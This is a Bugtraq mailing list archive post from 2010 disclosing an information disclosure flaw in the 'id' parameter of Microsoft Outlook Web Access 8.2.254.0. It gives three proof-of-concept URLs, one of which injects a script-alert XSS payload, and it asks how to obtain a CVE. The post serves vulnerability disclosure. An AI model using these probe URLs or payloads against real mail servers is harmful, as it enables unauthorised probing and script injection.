Bugtraq mailing list archives
Microsoft Outlook Web Access (OWA) v8.2.254.0 "id" parameter Information Disclosure Vulnerability
From: praveen_recker () sify com
Date: Thu, 20 May 2010 15:34:14 -0600
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ "Microsoft Outlook Web Access (OWA) version 8.2.254.0" OS: Windows Server 2003 Internet Explorer 7 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ There is an information disclosure vulnerability in "Microsoft Outlook Web Access (OWA) version 8.2.254.0". The issue is with the id parameter. Following are different exploitation techniques: https://example.com/owa/?ae=Folder&t=IPF.Note&id=<script>alert("HHH")</script> https://example.com/owa/?ae=Folder&t=IPF.Note&id= https://example.com/owa/?ae=Folder&t=IPF.Note&id=A Whom to contact to get a CVE Identifier for this vulnerability. Best Regards, Praveen Darshanam, Security Researcher, INDIA
Current thread:
- Microsoft Outlook Web Access (OWA) v8.2.254.0 "id" parameter Information Disclosure Vulnerability praveen_recker (May 21)
- Re: Microsoft Outlook Web Access (OWA) v8.2.254.0 "id" parameter Information Disclosure Vulnerability Jabłoński , Paweł (May 25)
- <Possible follow-ups>
- Re: Microsoft Outlook Web Access (OWA) v8.2.254.0 "id" parameter Information Disclosure Vulnerability info (May 25)